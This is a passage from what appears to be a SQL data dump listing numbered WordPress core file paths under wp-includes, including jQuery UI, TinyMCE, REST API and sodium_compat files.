ouse.min.js'),(5379,'wp-includes/js/jquery/ui/progressbar.js'),(5380,'wp-includes/js/jquery/ui/progressbar.min.js'),(5381,'wp-includes/js/jquery/ui/resizable.js'),(5382,'wp-includes/js/jquery/ui/resizable.min.js'),(5383,'wp-includes/js/jquery/ui/selectable.js'),(5384,'wp-includes/js/jquery/ui/selectable.min.js'),(5385,'wp-includes/js/jquery/ui/selectmenu.js'),(5386,'wp-includes/js/jquery/ui/selectmenu.min.js'),(5387,'wp-includes/js/jquery/ui/slider.js'),(5388,'wp-includes/js/jquery/ui/slider.min.js'),(5389,'wp-includes/js/jquery/ui/sortable.js'),(5390,'wp-includes/js/jquery/ui/sortable.min.js'),(5391,'wp-includes/js/jquery/ui/spinner.js'),(5392,'wp-includes/js/jquery/ui/spinner.min.js'),(5393,'wp-includes/js/jquery/ui/tabs.js'),(5394,'wp-includes/js/jquery/ui/tabs.min.js'),(5395,'wp-includes/js/jquery/ui/tooltip.js'),(5396,'wp-includes/js/jquery/ui/tooltip.min.js'),(5397,'wp-includes/js/json2.js'),(5398,'wp-includes/js/json2.min.js'),(5399,'wp-includes/js/masonry.min.js'),(5400,'wp-includes/js/mce-view.js'),(5401,'wp-includes/js/mce-view.min.js'),(5402,'wp-includes/js/media-audiovideo.js'),(5403,'wp-includes/js/media-audiovideo.min.js'),(5404,'wp-includes/js/media-editor.js'),(5405,'wp-includes/js/media-editor.min.js'),(5406,'wp-includes/js/media-grid.js'),(5407,'wp-includes/js/media-grid.min.js'),(5408,'wp-includes/js/media-models.js'),(5409,'wp-includes/js/media-models.min.js'),(5410,'wp-includes/js/media-views.js'),(5411,'wp-includes/js/media-views.min.js'),(5412,'wp-includes/js/mediaelement/mediaelement-and-player.js'),(5413,'wp-includes/js/mediaelement/mediaelement-and-player.min.js'),(5414,'wp-includes/js/mediaelement/mediaelement-migrate.js'),(5415,'wp-includes/js/mediaelement/mediaelement-migrate.min.js'),(5416,'wp-includes/js/mediaelement/mediaelement.js'),(5417,'wp-includes/js/mediaelement/mediaelement.min.js'),(5418,'wp-includes/js/mediaelement/mediaelementplayer-legacy.css'),(5419,'wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css'),(5420,'wp-includes/js/mediaelement/mediaelementplayer.css'),(5421,'wp-includes/js/mediaelement/mediaelementplayer.min.css'),(5422,'wp-includes/js/mediaelement/mejs-controls.png'),(5423,'wp-includes/js/mediaelement/mejs-controls.svg'),(5424,'wp-includes/js/mediaelement/renderers/vimeo.js'),(5425,'wp-includes/js/mediaelement/renderers/vimeo.min.js'),(5426,'wp-includes/js/mediaelement/wp-mediaelement.css'),(5427,'wp-includes/js/mediaelement/wp-mediaelement.js'),(5428,'wp-includes/js/mediaelement/wp-mediaelement.min.css'),(5429,'wp-includes/js/mediaelement/wp-mediaelement.min.js'),(5430,'wp-includes/js/mediaelement/wp-playlist.js'),(5431,'wp-includes/js/mediaelement/wp-playlist.min.js'),(5432,'wp-includes/js/plupload/handlers.js'),(5433,'wp-includes/js/plupload/handlers.min.js'),(5434,'wp-includes/js/plupload/license.txt'),(5435,'wp-includes/js/plupload/moxie.js'),(5436,'wp-includes/js/plupload/moxie.min.js'),(5437,'wp-includes/js/plupload/plupload.js'),(5438,'wp-includes/js/plupload/plupload.min.js'),(5439,'wp-includes/js/plupload/wp-plupload.js'),(5440,'wp-includes/js/plupload/wp-plupload.min.js'),(5441,'wp-includes/js/quicktags.js'),(5442,'wp-includes/js/quicktags.min.js'),(5443,'wp-includes/js/shortcode.js'),(5444,'wp-includes/js/shortcode.min.js'),(5445,'wp-includes/js/swfobject.js'),(5446,'wp-includes/js/swfupload/handlers.js'),(5447,'wp-includes/js/swfupload/handlers.min.js'),(5448,'wp-includes/js/swfupload/license.txt'),(5449,'wp-includes/js/swfupload/swfupload.js'),(5450,'wp-includes/js/thickbox/loadingAnimation.gif'),(5451,'wp-includes/js/thickbox/macFFBgHack.png'),(5452,'wp-includes/js/thickbox/thickbox.css'),(5453,'wp-includes/js/thickbox/thickbox.js'),(5454,'wp-includes/js/tinymce/langs/wp-langs-en.js'),(5455,'wp-includes/js/tinymce/license.txt'),(5456,'wp-includes/js/tinymce/plugins/charmap/plugin.js'),(5457,'wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),(5458,'wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),(5459,'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),(5460,'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),(5461,'wp-includes/js/tinymce/plugins/compat3x/plugin.js'),(5462,'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),(5463,'wp-includes/js/tinymce/plugins/directionality/plugin.js'),(5464,'wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),(5465,'wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),(5466,'wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),(5467,'wp-includes/js/tinymce/plugins/hr/plugin.js'),(5468,'wp-includes/js/tinymce/plugins/hr/plugin.min.js'),(5469,'wp-includes/js/tinymce/plugins/image/plugin.js'),(5470,'wp-includes/js/tinymce/plugins/image/plugin.min.js'),(5471,'wp-includes/js/tinymce/plugins/link/plugin.js'),(5472,'wp-includes/js/tinymce/plugins/link/plugin.min.js'),(5473,'wp-includes/js/tinymce/plugins/lists/plugin.js'),(5474,'wp-includes/js/tinymce/plugins/lists/plugin.min.js'),(5475,'wp-includes/js/tinymce/plugins/media/plugin.js'),(5476,'wp-includes/js/tinymce/plugins/media/plugin.min.js'),(5477,'wp-includes/js/tinymce/plugins/paste/plugin.js'),(5478,'wp-includes/js/tinymce/plugins/paste/plugin.min.js'),(5479,'wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),(5480,'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),(5481,'wp-includes/js/tinymce/plugins/textcolor/plugin.js'),(5482,'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),(5483,'wp-includes/js/tinymce/plugins/wordpress/plugin.js'),(5484,'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),(5485,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),(5486,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),(5487,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),(5488,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),(5489,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),(5490,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),(5491,'wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),(5492,'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),(5493,'wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),(5494,'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),(5495,'wp-includes/js/tinymce/plugins/wplink/plugin.js'),(5496,'wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),(5497,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),(5498,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),(5499,'wp-includes/js/tinymce/plugins/wpview/plugin.js'),(5500,'wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),(5501,'wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),(5502,'wp-includes/js/tinymce/skins/lightgray/content.min.css'),(5503,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot'),(5504,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg'),(5505,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf'),(5506,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff'),(5507,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot'),(5508,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg'),(5509,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf'),(5510,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff'),(5511,'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),(5512,'wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),(5513,'wp-includes/js/tinymce/skins/lightgray/img/object.gif'),(5514,'wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),(5515,'wp-includes/js/tinymce/skins/lightgray/skin.min.css'),(5516,'wp-includes/js/tinymce/skins/wordpress/images/audio.png'),(5517,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),(5518,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),(5519,'wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),(5520,'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),(5521,'wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),(5522,'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),(5523,'wp-includes/js/tinymce/skins/wordpress/images/more.png'),(5524,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),(5525,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),(5526,'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),(5527,'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),(5528,'wp-includes/js/tinymce/skins/wordpress/images/video.png'),(5529,'wp-includes/js/tinymce/skins/wordpress/wp-content.css'),(5530,'wp-includes/js/tinymce/themes/inlite/theme.js'),(5531,'wp-includes/js/tinymce/themes/inlite/theme.min.js'),(5532,'wp-includes/js/tinymce/themes/modern/theme.js'),(5533,'wp-includes/js/tinymce/themes/modern/theme.min.js'),(5534,'wp-includes/js/tinymce/tiny_mce_popup.js'),(5535,'wp-includes/js/tinymce/tinymce.min.js'),(5536,'wp-includes/js/tinymce/utils/editable_selects.js'),(5537,'wp-includes/js/tinymce/utils/form_utils.js'),(5538,'wp-includes/js/tinymce/utils/mctabs.js'),(5539,'wp-includes/js/tinymce/utils/validate.js'),(5540,'wp-includes/js/tinymce/wp-tinymce.js'),(5541,'wp-includes/js/tinymce/wp-tinymce.php'),(5542,'wp-includes/js/tw-sack.js'),(5543,'wp-includes/js/tw-sack.min.js'),(5544,'wp-includes/js/twemoji.js'),(5545,'wp-includes/js/twemoji.min.js'),(5546,'wp-includes/js/underscore.js'),(5547,'wp-includes/js/underscore.min.js'),(5548,'wp-includes/js/utils.js'),(5549,'wp-includes/js/utils.min.js'),(5550,'wp-includes/js/wp-ajax-response.js'),(5551,'wp-includes/js/wp-ajax-response.min.js'),(5552,'wp-includes/js/wp-api.js'),(5553,'wp-includes/js/wp-api.min.js'),(5554,'wp-includes/js/wp-auth-check.js'),(5555,'wp-includes/js/wp-auth-check.min.js'),(5556,'wp-includes/js/wp-backbone.js'),(5557,'wp-includes/js/wp-backbone.min.js'),(5558,'wp-includes/js/wp-custom-header.js'),(5559,'wp-includes/js/wp-custom-header.min.js'),(5560,'wp-includes/js/wp-embed-template.js'),(5561,'wp-includes/js/wp-embed-template.min.js'),(5562,'wp-includes/js/wp-embed.js'),(5563,'wp-includes/js/wp-embed.min.js'),(5564,'wp-includes/js/wp-emoji-loader.js'),(5565,'wp-includes/js/wp-emoji-loader.min.js'),(5566,'wp-includes/js/wp-emoji-release.min.js'),(5567,'wp-includes/js/wp-emoji.js'),(5568,'wp-includes/js/wp-emoji.min.js'),(5569,'wp-includes/js/wp-list-revisions.js'),(5570,'wp-includes/js/wp-list-revisions.min.js'),(5571,'wp-includes/js/wp-lists.js'),(5572,'wp-includes/js/wp-lists.min.js'),(5573,'wp-includes/js/wp-pointer.js'),(5574,'wp-includes/js/wp-pointer.min.js'),(5575,'wp-includes/js/wp-sanitize.js'),(5576,'wp-includes/js/wp-sanitize.min.js'),(5577,'wp-includes/js/wp-util.js'),(5578,'wp-includes/js/wp-util.min.js'),(5579,'wp-includes/js/wpdialog.js'),(5580,'wp-includes/js/wpdialog.min.js'),(5581,'wp-includes/js/wplink.js'),(5582,'wp-includes/js/wplink.min.js'),(5583,'wp-includes/js/zxcvbn-async.js'),(5584,'wp-includes/js/zxcvbn-async.min.js'),(5585,'wp-includes/js/zxcvbn.min.js'),(5586,'wp-includes/kses.php'),(5587,'wp-includes/l10n.php'),(5588,'wp-includes/link-template.php'),(5589,'wp-includes/load.php'),(5590,'wp-includes/locale.php'),(5591,'wp-includes/media-template.php'),(5592,'wp-includes/media.php'),(5593,'wp-includes/meta.php'),(5594,'wp-includes/ms-blogs.php'),(5595,'wp-includes/ms-default-constants.php'),(5596,'wp-includes/ms-default-filters.php'),(5597,'wp-includes/ms-deprecated.php'),(5598,'wp-includes/ms-files.php'),(5599,'wp-includes/ms-functions.php'),(5600,'wp-includes/ms-load.php'),(5601,'wp-includes/ms-network.php'),(5602,'wp-includes/ms-settings.php'),(5603,'wp-includes/ms-site.php'),(5604,'wp-includes/nav-menu-template.php'),(5605,'wp-includes/nav-menu.php'),(5606,'wp-includes/option.php'),(5607,'wp-includes/pluggable-deprecated.php'),(5608,'wp-includes/pluggable.php'),(5609,'wp-includes/plugin.php'),(5610,'wp-includes/pomo/entry.php'),(5611,'wp-includes/pomo/mo.php'),(5612,'wp-includes/pomo/plural-forms.php'),(5613,'wp-includes/pomo/po.php'),(5614,'wp-includes/pomo/pomo/entry.php'),(5615,'wp-includes/pomo/pomo/mo.php'),(5616,'wp-includes/pomo/pomo/plural-forms.php'),(5617,'wp-includes/pomo/pomo/po.php'),(5618,'wp-includes/pomo/pomo/streams.php'),(5619,'wp-includes/pomo/pomo/translations.php'),(5620,'wp-includes/pomo/streams.php'),(5621,'wp-includes/pomo/translations.php'),(5622,'wp-includes/post-formats.php'),(5623,'wp-includes/post-template.php'),(5624,'wp-includes/post-thumbnail-template.php'),(5625,'wp-includes/post.php'),(5626,'wp-includes/query.php'),(5627,'wp-includes/random_compat/byte_safe_strings.php'),(5628,'wp-includes/random_compat/cast_to_int.php'),(5629,'wp-includes/random_compat/error_polyfill.php'),(5630,'wp-includes/random_compat/random.php'),(5631,'wp-includes/random_compat/random_bytes_com_dotnet.php'),(5632,'wp-includes/random_compat/random_bytes_dev_urandom.php'),(5633,'wp-includes/random_compat/random_bytes_libsodium.php'),(5634,'wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(5635,'wp-includes/random_compat/random_bytes_mcrypt.php'),(5636,'wp-includes/random_compat/random_int.php'),(5637,'wp-includes/registration-functions.php'),(5638,'wp-includes/registration.php'),(5639,'wp-includes/rest-api/class-wp-rest-request.php'),(5640,'wp-includes/rest-api/class-wp-rest-response.php'),(5641,'wp-includes/rest-api/class-wp-rest-server.php'),(5642,'wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),(5643,'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(5644,'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(5645,'wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),(5646,'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(5647,'wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),(5648,'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(5649,'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(5650,'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(5651,'wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),(5652,'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(5653,'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(5654,'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(5655,'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(5656,'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(5657,'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(5658,'wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),(5659,'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(5660,'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(5661,'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(5662,'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(5663,'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(5664,'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(5665,'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(5666,'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(5667,'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(5668,'wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),(5669,'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(5670,'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(5671,'wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),(5672,'wp-includes/rest-api.php'),(5673,'wp-includes/revision.php'),(5674,'wp-includes/rewrite.php'),(5675,'wp-includes/robots-template.php'),(5676,'wp-includes/rss-functions.php'),(5677,'wp-includes/rss.php'),(5678,'wp-includes/script-loader.php'),(5679,'wp-includes/session.php'),(5680,'wp-includes/shortcodes.php'),(5681,'wp-includes/sitemaps/class-wp-sitemaps-index.php'),(5682,'wp-includes/sitemaps/class-wp-sitemaps-provider.php'),(5683,'wp-includes/sitemaps/class-wp-sitemaps-registry.php'),(5684,'wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),(5685,'wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),(5686,'wp-includes/sitemaps/class-wp-sitemaps.php'),(5687,'wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),(5688,'wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),(5689,'wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),(5690,'wp-includes/sitemaps.php'),(5691,'wp-includes/sodium_compat/LICENSE'),(5692,'wp-includes/sodium_compat/autoload-php7.php'),(5693,'wp-includes/sodium_compat/autoload.php'),(5694,'wp-includes/sodium_compat/composer.json'),(5695,'wp-includes/sodium_compat/lib/constants.php'),(5696,'wp-includes/sodium_compat/lib/namespaced.php'),(5697,'wp-includes/sodium_compat/lib/php72compat.php'),(5698,'wp-includes/sodium_compat/lib/php72compat_const.php'),(5699,'wp-includes/sodium_compat/lib/ristretto255.php'),(5700,'wp-includes/sodium_compat/lib/sodium_compat.php'),(5701,'wp-includes/sodium_compat/lib/stream-xchacha20.php'),(5702,'wp-includes/sodium_compat/namespaced/Compat.php'),(5703,'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(5704,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(5705,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(5706,'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(5707,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(5708,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(5709,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(5710,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(5711,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(5712,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(5713,'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(5714,'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(5715,'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(5716,'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(5717,'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(5718,'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(5719,'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(5720,'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(5721,'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(5722,'wp-includes/sodium_compat/namespaced/Core/Util.php'),(5723,'wp-includes/sodium_compat/namespaced/Core/X25519.php'),(5724,'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(5725,'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(5726,'wp-includes/sodium_compat/namespaced/Crypto.php'),(5727,'wp-includes/sodium_compat/namespaced/File.php'),(5728,'wp-includes/sodium_compat/src/Compat.php'),(5729,'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(5730,'wp-includes/sodium_compat/src/Core/Base64/Common.php'),(5731,'wp-includes/sodium_compat/src/Core/Base64/Original.php'),(5732,'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(5733,'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(5734,'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(5735,'wp-includes/sodium_compat/src/Core/ChaCha20.php'),(5736,'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(5737,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(5738,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(5739,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(5740,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(5741,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(5742,'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(5743,'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(5744,'wp-includes/sodium_compat/src/Core/Curve25519.php'),(5745,'wp-includes/sodium_compat/src/Core/Ed25519.php'),(5746,'wp-includes/sodium_compat/src/Core/HChaCha20.php'),(5747,'wp-includes/sodium_compat/src/Core/HSalsa20.php'),(5748,'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(5749,'wp-includes/sodium_compat/src/Core/Poly1305.php'),(5750,'wp-includes/sodium_compat/src/Core/Ristretto255.php'),(5751,'wp-includes/sodium_compat/src/Core/Salsa20.php'),(5752,'wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(5753,'wp-includes/sodium_compat/src/Core/SipHash.php'),(5754,'wp-includes/sodium_compat/src/Core/Util.php'),(5755,'wp-includes/sodium_compat/src/Core/X25519.php'),(5756,'wp-includes/sodium_compat/src/Core/XChaCha20.php'),(5757,'wp-includes/sodium_compat/src/Core/XSalsa20.php'),(5758,'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(5759,'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(5760,'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(5761,'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(5762,'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(5763,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(5764,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(5765,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(5766,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(5767,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(5768,'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(5769,'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(5770,'wp-includes/sodium_compat/src/Core32/Curve25519.php'),(5771,'wp-includes/sodium_compat/src/Core32/Ed25519.php'),(5772,'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(5773,'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(5774,'wp-includes/sodium_compat/src/Core32/Int32.php'),(5775,'wp-includes/sodium_compat/src/Core32/Int64.php'),(5776,'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(5777,'wp-includes/sodium_compat/src/Core32/Poly1305.php'),(5778,'wp-includes/sodium_compat/src/Core32/Salsa20.php'),(5779,'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(5780,'wp-includes/sodium_compat/src/Core32/SipHash.php'),(5781,'wp-includes/sodium_compat/src/Core32/Util.php'),(5782,'wp-includes/sodium_compat/src/Core32/X25519.php'),(5783,'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(5784,'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(5785,'wp-includes/sodium_compat/src/Crypto.php'),(5786,'wp-includes/sodium_compat/src/Crypto32.php'),(5787,'wp-includes/sodium_compat/src/File.php'),(5788,'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(5789,'wp-includes/sodium_compat/src/SodiumException.php'),(5790,'wp-includes/spl-autoload-compat.php'),(5791,'wp-includes/taxonomy.php'),(5792,'wp-includes/template-loader.php'),(5793,'wp-includes/template.php'),(5794,'wp-includes/theme-compat/comments.php'),(5795,'wp-includes/theme-compat/embed-404.php'),(5796,'wp-includes/theme-compat/embed-content.php'),(5797,'wp-includes/theme-compat/embed.php'),(5798,'wp-includes/theme-compat/footer-embed.php'),(5799,'wp-includes/theme-compat/footer.php'),(5800,'wp-includes/theme-compat/header-embed.php'),(5801,'wp-includes/theme-compat/header.php'),(5802,'wp-includes/theme-compat/sidebar.php'),(5803,'wp-includes/theme.php'),(5804,'wp-includes/update.php'),(5805,'wp-includes/user.php'),(5806,'wp-includes/vars.php'),(5807,'wp-includes/version.php'),(5808,'wp-includes/widgets/class-wp-nav-menu-widget.php'),(5809,'wp-includes/widgets/class-wp-widget-archives.php'),(5810,'wp-includes/widgets/class-wp-widget-calendar.php'),(5811,'wp-includes/widgets/class-wp-widget-categories.php'),(5812,'wp-includes/widgets/class-wp-widget-custom-html.php'),(5813,'wp-includes/widgets/class-wp-widget-links.php'),(5814,'wp-includes/widgets/class-wp-widget-media-audio.php'),(5815,'wp-includes/widgets/class-wp-widget-media-gallery.php'),(5816,'wp-includes/widgets/class-wp-widget-media-image.php'),(5817,'wp-includes/widgets/class-wp-widget-media-video.php'),(5818,'wp-includes/widgets/class-wp-widget-media.php'),(5819,'wp-includes/widgets/class-wp-widget-meta.php'),(5820,'wp-includes/widgets/class-wp-widget-pages.php'),(5821,'wp-includes/widgets/class-wp-widget-recent-comments.php'),(5822,'wp-includes/widgets/class-wp-widget-recent-posts.php'),(5823,'wp-includes/widgets/class-wp-widget-rss.php'),(5824,'wp-includes/widgets/class-wp-widget-search.php'),(5825,'wp-includes/widgets/class-wp-widget-tag-cloud.php'),(5826,'wp-includes/widgets/class-wp-widget-text.php'),(5827,'wp-includes/widgets.php'),(5828,'wp-includes/wlwmanifest.xml'),(5829,'wp-includes/wp-db.php'),(5830,'wp-includes/wp-diff.php'),(5831,'wp-includes/wp-includes/ID3/getid3.lib.php'),(5832,'wp-includes/wp-includes/ID3/getid3.php'),(5833,'wp-includes/wp-includes/ID3/license.commercial.txt'),(5834,'wp-includes/wp-includes/ID3/license.txt'),(5835,'wp-includes/wp-includes/ID3/module.audio-video.asf.php'),(5836,'wp-includes/wp-includes/ID3/module.audio-video.flv.php'),(5837,'wp-includes/wp-includes/ID3/module.audio-video.matroska.php'),(5838,'wp-includes/wp-includes/ID3/module.audio-video.quicktime.php'),(5839,'wp-includes/wp-includes/ID3/module.audio-video.riff.php'),(5840,'wp-includes/wp-includes/ID3/module.audio.ac3.php'),(5841,'wp-includes/wp-includes/ID3/module.audio.dts.php'),(5842,'wp-includes/wp-includes/ID3/module.audio.flac.php'),(5843,'wp-includes/wp-includes/ID3/module.audio.mp3.php'),(5844,'wp-includes/wp-includes/ID3/module.audio.ogg.php'),(5845,'wp-includes/wp-includes/ID3/module.tag.apetag.php'),(5846,'wp-includes/wp-includes/ID3/module.tag.id3v1.php'),(5847,'wp-includes/wp-includes/ID3/module.tag.id3v2.php'),(5848,'wp-includes/wp-includes/ID3/module.tag.lyrics3.php'),(5849,'wp-includes/wp-includes/ID3/readme.txt'),(5850,'wp-includes/wp-includes/IXR/class-IXR-base64.php'),(5851,'wp-includes/wp-includes/IXR/class-IXR-client.php'),(5852,'wp-includes/wp-includes/IXR/class-IXR-clientmulticall.php'),(5853,'wp-includes/wp-includes/IXR/class-IXR-date.php'),(5854,'wp-includes/wp-includes/IXR/class-IXR-error.php'),(5855,'wp-includes/wp-includes/IXR/class-IXR-introspectionserver.php'),(5856,'wp-includes/wp-includes/IXR/class-IXR-message.php'),(5857,'wp-includes/wp-includes/IXR/class-IXR-request.php'),(5858,'wp-includes/wp-includes/IXR/class-IXR-server.php'),(5859,'wp-includes/wp-includes/IXR/class-IXR-value.php'),(5860,'wp-includes/wp-includes/PHPMailer/Exception.php'),(5861,'wp-includes/wp-includes/PHPMailer/PHPMailer.php'),(5862,'wp-includes/wp-includes/PHPMailer/SMTP.php'),(5863,'wp-includes/wp-includes/Requests/Auth/Basic.php'),(5864,'wp-includes/wp-includes/Requests/Auth.php'),(5865,'wp-includes/wp-includes/Requests/Cookie/Jar.php'),(5866,'wp-includes/wp-includes/Requests/Cookie.php'),(5867,'wp-includes/wp-includes/Requests/Exception/HTTP/304.php'),(5868,'wp-includes/wp-includes/Requests/Exception/HTTP/305.php'),(5869,'wp-includes/wp-includes/Requests/Exception/HTTP/306.php'),(5870,'wp-includes/wp-includes/Requests/Exception/HTTP/400.php'),(5871,'wp-includes/wp-includes/Requests/Exception/HTTP/401.php'),(5872,'wp-includes/wp-includes/Requests/Exception/HTTP/402.php'),(5873,'wp-includes/wp-includes/Requests/Exception/HTTP/403.php'),(5874,'wp-includes/wp-includes/Requests/Exception/HTTP/404.php'),(5875,'wp-includes/wp-includes/Requests/Exception/HTTP/405.php'),(5876,'wp-includes/wp-includes/Requests/Exception/HTTP/406.php'),(5877,'wp-includes/wp-includes/Requests/Exception/HTTP/407.